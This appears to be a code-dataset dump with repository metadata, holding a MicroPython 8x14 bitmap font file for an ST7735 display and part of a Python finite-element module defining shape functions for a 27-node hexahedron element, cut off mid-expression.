b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | 6
|
2020-07-11T16:59:19.000Z
|
2021-07-16T19:32:49.000Z
|
ports/esp32/user_modules/st7735_mpy/fonts/m32_8x14.py
|
d4niele/micropython
|
a1f7b37d392bf46b28045ce215ae899fda8d8c38
|
[
"MIT"
] | 1
|
2020-04-14T03:14:45.000Z
|
2020-04-14T03:14:45.000Z
|
fonts/m32_8x14.py
|
ccccmagicboy/st7735_mpy
|
b15f1bde69fbe6e0eb4931c57e71c136d8e7f024
|
[
"MIT"
] | null | null | null |
"""converted from ..\fonts\M32_8x14.bin """
WIDTH = 8
HEIGHT = 14
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x3c\x3c\x3c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x36\x36\x36\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x6c\x6c\x6c\xfe\x6c\x6c\xfe\x6c\x6c\x00\x00\x00'\
b'\x00\x18\x18\x7c\xc6\xc0\x78\x3c\x06\xc6\x7c\x18\x18\x00'\
b'\x00\x00\x00\x00\x62\x66\x0c\x18\x30\x66\xc6\x00\x00\x00'\
b'\x00\x00\x38\x6c\x38\x38\x76\xf6\xce\xcc\x76\x00\x00\x00'\
b'\x00\x0c\x0c\x0c\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x0c\x18\x30\x30\x30\x30\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x30\x18\x0c\x0c\x0c\x0c\x0c\x18\x30\x00\x00\x00'\
b'\x00\x00\x00\x00\x6c\x38\xfe\x38\x6c\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x18\x18\x7e\x18\x18\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x0c\x0c\x18\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x00\x02\x06\x0c\x18\x30\x60\xc0\x80\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xce\xde\xf6\xe6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x18\x78\x18\x18\x18\x18\x18\x18\x7e\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x30\x60\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x06\x3c\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x0c\x1c\x3c\x6c\xcc\xfe\x0c\x0c\x0c\x00\x00\x00'\
b'\x00\x00\xfe\xc0\xc0\xc0\xfc\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc0\xc0\xfc\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x0c\x18\x30\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7e\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x0c\x0c\x00\x00\x0c\x0c\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x0c\x0c\x00\x00\x0c\x0c\x0c\x18\x00\x00'\
b'\x00\x00\x0c\x18\x30\x60\xc0\x60\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xfe\x00\xfe\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x60\x30\x18\x0c\x06\x0c\x18\x30\x60\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xde\xde\xde\xdc\xc0\x7e\x00\x00\x00'\
b'\x00\x00\x38\x6c\xc6\xc6\xc6\xfe\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x66\x66\x66\xfc\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc0\xc0\xc0\xc0\xc0\x66\x3c\x00\x00\x00'\
b'\x00\x00\xf8\x6c\x66\x66\x66\x66\x66\x6c\xf8\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x7c\x60\x60\x66\xfe\x00\x00\x00'\
b'\x00\x00\xfe\x66\x60\x60\x7c\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc0\xc0\xce\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xfe\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x3c\x18\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x3c\x18\x18\x18\x18\x18\xd8\xd8\x70\x00\x00\x00'\
b'\x00\x00\xc6\xcc\xd8\xf0\xf0\xd8\xcc\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xf0\x60\x60\x60\x60\x60\x62\x66\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xee\xfe\xd6\xd6\xd6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xe6\xe6\xf6\xde\xce\xce\xc6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xc6\xc6\xd6\x7c\x06\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc0\x60\x38\x0c\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7e\x5a\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\x6c\x38\x10\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xd6\xd6\xd6\xfe\xee\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xc6\x6c\x38\x38\x38\x6c\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x66\x66\x66\x66\x3c\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x8c\x18\x30\x60\xc2\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\x60\x60\x60\x60\x60\x60\x60\x7c\x00\x00\x00'\
b'\x00\x00\x00\x80\xc0\x60\x30\x18\x0c\x06\x02\x00\x00\x00'\
b'\x00\x00\x7c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x7c\x00\x00\x00'\
b'\x00\x10\x38\x6c\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00'\
b'\x00\x18\x18\x18\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x78\x0c\x7c\xcc\xdc\x76\x00\x00\x00'\
b'\x00\x00\xe0\x60\x60\x7c\x66\x66\x66\x66\xfc\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc0\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x1c\x0c\x0c\x7c\xcc\xcc\xcc\xcc\x7e\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xfe\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x1c\x36\x30\x30\xfc\x30\x30\x30\x78\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x76\xce\xc6\xc6\x7e\x06\xc6\x7c\x00'\
b'\x00\x00\xe0\x60\x60\x6c\x76\x66\x66\x66\xe6\x00\x00\x00'\
b'\x00\x00\x18\x18\x00\x38\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x0c\x0c\x00\x1c\x0c\x0c\x0c\x0c\xcc\xcc\x78\x00'\
b'\x00\x00\xe0\x60\x60\x66\x6c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x18\x18\x18\x18\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x6c\xfe\xd6\xd6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x7c\x60\x60\xf0\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\x0c\x1e\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\x70\x1c\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x30\x30\x30\xfc\x30\x30\x30\x36\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xc6\x6c\x38\x10\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xd6\xd6\xfe\x6c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\x6c\x38\x38\x6c\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xc6\xce\x76\x06\xc6\x7c\x00'\
b'\x00\x00\x00\x00\x00\xfe\x8c\x18\x30\x62\xfe\x00\x00\x00'\
b'\x00\x00\x0e\x18\x18\x18\x70\x18\x18\x18\x0e\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x00\x18\x18\x18\x18\x00\x00\x00'\
b'\x00\x00\x70\x18\x18\x18\x0e\x18\x18\x18\x70\x00\x00\x00'\
b'\x00\x00\x76\xdc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x10\x38\x38\x6c\x6c\xfe\x00\x00\x00\x00'\
FONT = memoryview(_FONT)
| 56.971429
| 60
| 0.704112
| 1,458
| 5,982
| 2.886831
| 0.041838
| 0.59444
| 0.504633
| 0.342124
| 0.841055
| 0.77952
| 0.73034
| 0.648848
| 0.570444
| 0.49608
| 0
| 0.374659
| 0.019726
| 5,982
| 104
| 61
| 57.519231
| 0.343111
| 0.005851
| 0
| 0
| 0
| 0.941176
| 0.905203
| 0.905203
| 0
| 1
| 0.001347
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
db77973a39d3606e6fa621268ac90f214a0ff2cb
| 16,948
|
py
|
Python
|
src/dewloosh/geom/cells/h27.py
|
dewloosh/dewloosh-geom
|
5c97fbab4b68f4748bf4309184b9e0e877f94cd6
|
[
"MIT"
] | 2
|
2021-12-11T17:25:51.000Z
|
2022-01-06T15:36:27.000Z
|
src/dewloosh/geom/cells/h27.py
|
dewloosh/dewloosh-geom
|
5c97fbab4b68f4748bf4309184b9e0e877f94cd6
|
[
"MIT"
] | null | null | null |
src/dewloosh/geom/cells/h27.py
|
dewloosh/dewloosh-geom
|
5c97fbab4b68f4748bf4309184b9e0e877f94cd6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from dewloosh.geom.polyhedron import TriquadraticHexaHedron
from dewloosh.math.numint import GaussPoints as Gauss
from dewloosh.geom.utils import cells_coords
from numba import njit, prange
import numpy as np
from numpy import ndarray
__cache = True
@njit(nogil=True, cache=__cache)
def monoms_H27(pcoord: np.ndarray):
r, s, t = pcoord
return np.array([1, r, s, t, s*t, r*t, r*s, r*s*t, r**2, s**2, t**2,
r**2*s, r*s**2, r*t**2, r**2*t, s**2*t, s*t**2, r**2*s*t,
r*s**2*t, r*s*t**2, r**2*s**2, s**2*t**2, r**2*t**2,
r**2*s**2*t**2, r**2*s**2*t, r**2*s*t**2, r*s**2*t**2])
@njit(nogil=True, cache=__cache)
def shp_H27(pcoord):
r, s, t = pcoord
return np.array(
[0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 +
0.125*r**2*s*t - 0.125*r*s**2*t**2 + 0.125*r*s**2*t +
0.125*r*s*t**2 - 0.125*r*s*t,
0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 +
0.125*r**2*s*t + 0.125*r*s**2*t**2 - 0.125*r*s**2*t -
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 -
0.125*r**2*s*t + 0.125*r*s**2*t**2 - 0.125*r*s**2*t +
0.125*r*s*t**2 - 0.125*r*s*t,
0.125*r**2*s**2*t**2 - 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 -
0.125*r**2*s*t - 0.125*r*s**2*t**2 + 0.125*r*s**2*t -
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 -
0.125*r**2*s*t - 0.125*r*s**2*t**2 - 0.125*r*s**2*t +
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t - 0.125*r**2*s*t**2 -
0.125*r**2*s*t + 0.125*r*s**2*t**2 + 0.125*r*s**2*t -
0.125*r*s*t**2 - 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 +
0.125*r**2*s*t + 0.125*r*s**2*t**2 + 0.125*r*s**2*t +
0.125*r*s*t**2 + 0.125*r*s*t,
0.125*r**2*s**2*t**2 + 0.125*r**2*s**2*t + 0.125*r**2*s*t**2 +
0.125*r**2*s*t - 0.125*r*s**2*t**2 - 0.125*r*s**2*t -
0.125*r*s*t**2 - 0.125*r*s*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t + 0.25*r**2*s*t**2 -
0.25*r**2*s*t + 0.25*s**2*t**2 - 0.25*s**2*t - 0.25*s*t**2 + 0.25*s*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t + 0.25*r**2*t**2 -
0.25*r**2*t - 0.25*r*s**2*t**2 + 0.25*r*s**2*t +
0.25*r*t**2 - 0.25*r*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t - 0.25*r**2*s*t**2 +
0.25*r**2*s*t + 0.25*s**2*t**2 - 0.25*s**2*t +
0.25*s*t**2 - 0.25*s*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2*t + 0.25*r**2*t**2 -
0.25*r**2*t + 0.25*r*s**2*t**2 - 0.25*r*s**2*t -
0.25*r*t**2 + 0.25*r*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t + 0.25*r**2*s*t**2 +
0.25*r**2*s*t + 0.25*s**2*t**2 + 0.25*s**2*t - 0.25*s*t**2 - 0.25*s*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t + 0.25*r**2*t**2 +
0.25*r**2*t - 0.25*r*s**2*t**2 - 0.25*r*s**2*t +
0.25*r*t**2 + 0.25*r*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t - 0.25*r**2*s*t**2 -
0.25*r**2*s*t + 0.25*s**2*t**2 + 0.25*s**2*t + 0.25*s*t**2 + 0.25*s*t,
-0.25*r**2*s**2*t**2 - 0.25*r**2*s**2*t + 0.25*r**2*t**2 +
0.25*r**2*t + 0.25*r*s**2*t**2 + 0.25*r*s**2*t -
0.25*r*t**2 - 0.25*r*t,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 + 0.25*r**2*s*t**2 -
0.25*r**2*s + 0.25*r*s**2*t**2 - 0.25*r*s**2 -
0.25*r*s*t**2 + 0.25*r*s,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 + 0.25*r**2*s*t**2 -
0.25*r**2*s - 0.25*r*s**2*t**2 + 0.25*r*s**2 +
0.25*r*s*t**2 - 0.25*r*s,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 - 0.25*r**2*s*t**2 +
0.25*r**2*s - 0.25*r*s**2*t**2 + 0.25*r*s**2 -
0.25*r*s*t**2 + 0.25*r*s,
-0.25*r**2*s**2*t**2 + 0.25*r**2*s**2 - 0.25*r**2*s*t**2 +
0.25*r**2*s + 0.25*r*s**2*t**2 - 0.25*r*s**2 +
0.25*r*s*t**2 - 0.25*r*s,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 - 0.5*r**2*t**2 + 0.5*r**2 -
0.5*r*s**2*t**2 + 0.5*r*s**2 + 0.5*r*t**2 - 0.5*r,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 - 0.5*r**2*t**2 + 0.5*r**2 +
0.5*r*s**2*t**2 - 0.5*r*s**2 - 0.5*r*t**2 + 0.5*r,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 - 0.5*r**2*s*t**2 + 0.5*r**2*s -
0.5*s**2*t**2 + 0.5*s**2 + 0.5*s*t**2 - 0.5*s,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2 + 0.5*r**2*s*t**2 - 0.5*r**2*s -
0.5*s**2*t**2 + 0.5*s**2 - 0.5*s*t**2 + 0.5*s,
0.5*r**2*s**2*t**2 - 0.5*r**2*s**2*t - 0.5*r**2*t**2 + 0.5*r**2*t -
0.5*s**2*t**2 + 0.5*s**2*t + 0.5*t**2 - 0.5*t,
0.5*r**2*s**2*t**2 + 0.5*r**2*s**2*t - 0.5*r**2*t**2 - 0.5*r**2*t -
0.5*s**2*t**2 - 0.5*s**2*t + 0.5*t**2 + 0.5*t,
-1.0*r**2*s**2*t**2 + 1.0*r**2*s**2 + 1.0*r**2*t**2 - 1.0*r**2 +
1.0*s**2*t**2 - 1.0*s**2 - 1.0*t**2 + 1.0])
@njit(nogil=True, parallel=True, cache=__cache)
def shape_function_matrix_H27(pcoord: np.ndarray):
eye = np.eye(3, dtype=pcoord.dtype)
shp = shp_H27(pcoord)
res = np.zeros((3, 24), dtype=pcoord.dtype)
for i in prange(8):
res[:, i*3: (i+1) * 3] = eye*shp[i]
return res
@njit(nogil=True, cache=__cache)
def dshp_H27(pcoord):
r, s, t = pcoord
return np.array([
[0.25*r*s**2*t**2 - 0.25*r*s**2*t - 0.25*r*s*t**2 + 0.25*r*s*t -
0.125*s**2*t**2 + 0.125*s**2*t + 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t - 0.125*r**2*t**2 + 0.125*r**2*t
- 0.25*r*s*t**2 + 0.25*r*s*t + 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 - 0.25*r**2*s*t + 0.125*r**2*s
- 0.25*r*s**2*t + 0.125*r*s**2 + 0.25*r*s*t - 0.125*r*s],
[0.25*r*s**2*t**2 - 0.25*r*s**2*t - 0.25*r*s*t**2 + 0.25*r*s*t +
0.125*s**2*t**2 - 0.125*s**2*t - 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t - 0.125*r**2*t**2 + 0.125*r**2*t
+ 0.25*r*s*t**2 - 0.25*r*s*t - 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 - 0.25*r**2*s*t + 0.125*r**2*s
+ 0.25*r*s**2*t - 0.125*r*s**2 - 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 - 0.25*r*s**2*t + 0.25*r*s*t**2 - 0.25*r*s*t +
0.125*s**2*t**2 - 0.125*s**2*t + 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t + 0.125*r**2*t**2 - 0.125*r**2*t
+ 0.25*r*s*t**2 - 0.25*r*s*t + 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 + 0.25*r**2*s*t - 0.125*r**2*s
+ 0.25*r*s**2*t - 0.125*r*s**2 + 0.25*r*s*t - 0.125*r*s],
[0.25*r*s**2*t**2 - 0.25*r*s**2*t + 0.25*r*s*t**2 - 0.25*r*s*t -
0.125*s**2*t**2 + 0.125*s**2*t - 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 - 0.25*r**2*s*t + 0.125*r**2*t**2 - 0.125*r**2*t
- 0.25*r*s*t**2 + 0.25*r*s*t - 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t - 0.125*r**2*s**2 + 0.25*r**2*s*t - 0.125*r**2*s
- 0.25*r*s**2*t + 0.125*r*s**2 - 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t - 0.25*r*s*t**2 - 0.25*r*s*t -
0.125*s**2*t**2 - 0.125*s**2*t + 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t - 0.125*r**2*t**2 - 0.125*r**2*t
- 0.25*r*s*t**2 - 0.25*r*s*t + 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 - 0.25*r**2*s*t - 0.125*r**2*s
- 0.25*r*s**2*t - 0.125*r*s**2 + 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t - 0.25*r*s*t**2 - 0.25*r*s*t +
0.125*s**2*t**2 + 0.125*s**2*t - 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t - 0.125*r**2*t**2 - 0.125*r**2*t
+ 0.25*r*s*t**2 + 0.25*r*s*t - 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 - 0.25*r**2*s*t - 0.125*r**2*s
+ 0.25*r*s**2*t + 0.125*r*s**2 - 0.25*r*s*t - 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t + 0.25*r*s*t**2 + 0.25*r*s*t +
0.125*s**2*t**2 + 0.125*s**2*t + 0.125*s*t**2 + 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t + 0.125*r**2*t**2 + 0.125*r**2*t
+ 0.25*r*s*t**2 + 0.25*r*s*t + 0.125*r*t**2 + 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 + 0.25*r**2*s*t + 0.125*r**2*s
+ 0.25*r*s**2*t + 0.125*r*s**2 + 0.25*r*s*t + 0.125*r*s],
[0.25*r*s**2*t**2 + 0.25*r*s**2*t + 0.25*r*s*t**2 + 0.25*r*s*t -
0.125*s**2*t**2 - 0.125*s**2*t - 0.125*s*t**2 - 0.125*s*t,
0.25*r**2*s*t**2 + 0.25*r**2*s*t + 0.125*r**2*t**2 + 0.125*r**2*t
- 0.25*r*s*t**2 - 0.25*r*s*t - 0.125*r*t**2 - 0.125*r*t,
0.25*r**2*s**2*t + 0.125*r**2*s**2 + 0.25*r**2*s*t + 0.125*r**2*s
- 0.25*r*s**2*t - 0.125*r*s**2 - 0.25*r*s*t - 0.125*r*s],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t + 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t + 0.25*r**2*t**2 - 0.25*r**2*t +
0.5*s*t**2 - 0.5*s*t - 0.25*t**2 + 0.25*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 + 0.5*r**2*s*t - 0.25*r**2*s +
0.5*s**2*t - 0.25*s**2 - 0.5*s*t + 0.25*s],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t + 0.5*r*t**2 - 0.5*r*t -
0.25*s**2*t**2 + 0.25*s**2*t + 0.25*t**2 - 0.25*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t - 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 + 0.5*r**2*t - 0.25*r**2 -
0.5*r*s**2*t + 0.25*r*s**2 + 0.5*r*t - 0.25*r],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t - 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t - 0.25*r**2*t**2 + 0.25*r**2*t +
0.5*s*t**2 - 0.5*s*t + 0.25*t**2 - 0.25*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 - 0.5*r**2*s*t + 0.25*r**2*s +
0.5*s**2*t - 0.25*s**2 + 0.5*s*t - 0.25*s],
[-0.5*r*s**2*t**2 + 0.5*r*s**2*t + 0.5*r*t**2 - 0.5*r*t +
0.25*s**2*t**2 - 0.25*s**2*t - 0.25*t**2 + 0.25*t,
-0.5*r**2*s*t**2 + 0.5*r**2*s*t + 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s**2*t + 0.25*r**2*s**2 + 0.5*r**2*t - 0.25*r**2 +
0.5*r*s**2*t - 0.25*r*s**2 - 0.5*r*t + 0.25*r],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t + 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t + 0.25*r**2*t**2 + 0.25*r**2*t +
0.5*s*t**2 + 0.5*s*t - 0.25*t**2 - 0.25*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 + 0.5*r**2*s*t + 0.25*r**2*s +
0.5*s**2*t + 0.25*s**2 - 0.5*s*t - 0.25*s],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t + 0.5*r*t**2 + 0.5*r*t -
0.25*s**2*t**2 - 0.25*s**2*t + 0.25*t**2 + 0.25*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t - 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 + 0.5*r**2*t + 0.25*r**2 -
0.5*r*s**2*t - 0.25*r*s**2 + 0.5*r*t + 0.25*r],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t - 0.5*r*s*t**2 - 0.5*r*s*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t - 0.25*r**2*t**2 - 0.25*r**2*t +
0.5*s*t**2 + 0.5*s*t + 0.25*t**2 + 0.25*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 - 0.5*r**2*s*t - 0.25*r**2*s +
0.5*s**2*t + 0.25*s**2 + 0.5*s*t + 0.25*s],
[-0.5*r*s**2*t**2 - 0.5*r*s**2*t + 0.5*r*t**2 + 0.5*r*t +
0.25*s**2*t**2 + 0.25*s**2*t - 0.25*t**2 - 0.25*t,
-0.5*r**2*s*t**2 - 0.5*r**2*s*t + 0.5*r*s*t**2 + 0.5*r*s*t,
-0.5*r**2*s**2*t - 0.25*r**2*s**2 + 0.5*r**2*t + 0.25*r**2 +
0.5*r*s**2*t + 0.25*r*s**2 - 0.5*r*t - 0.25*r],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 + 0.5*r*s*t**2 - 0.5*r*s +
0.25*s**2*t**2 - 0.25*s**2 - 0.25*s*t**2 + 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s + 0.25*r**2*t**2 - 0.25*r**2 +
0.5*r*s*t**2 - 0.5*r*s - 0.25*r*t**2 + 0.25*r,
-0.5*r**2*s**2*t + 0.5*r**2*s*t + 0.5*r*s**2*t - 0.5*r*s*t],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 + 0.5*r*s*t**2 - 0.5*r*s -
0.25*s**2*t**2 + 0.25*s**2 + 0.25*s*t**2 - 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s + 0.25*r**2*t**2 - 0.25*r**2 -
0.5*r*s*t**2 + 0.5*r*s + 0.25*r*t**2 - 0.25*r,
-0.5*r**2*s**2*t + 0.5*r**2*s*t - 0.5*r*s**2*t + 0.5*r*s*t],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 - 0.5*r*s*t**2 + 0.5*r*s -
0.25*s**2*t**2 + 0.25*s**2 - 0.25*s*t**2 + 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s - 0.25*r**2*t**2 + 0.25*r**2 -
0.5*r*s*t**2 + 0.5*r*s - 0.25*r*t**2 + 0.25*r,
-0.5*r**2*s**2*t - 0.5*r**2*s*t - 0.5*r*s**2*t - 0.5*r*s*t],
[-0.5*r*s**2*t**2 + 0.5*r*s**2 - 0.5*r*s*t**2 + 0.5*r*s +
0.25*s**2*t**2 - 0.25*s**2 + 0.25*s*t**2 - 0.25*s,
-0.5*r**2*s*t**2 + 0.5*r**2*s - 0.25*r**2*t**2 + 0.25*r**2 +
0.5*r*s*t**2 - 0.5*r*s + 0.25*r*t**2 - 0.25*r,
-0.5*r**2*s**2*t - 0.5*r**2*s*t + 0.5*r*s**2*t + 0.5*r*s*t],
[1.0*r*s**2*t**2 - 1.0*r*s**2 - 1.0*r*t**2 + 1.0*r -
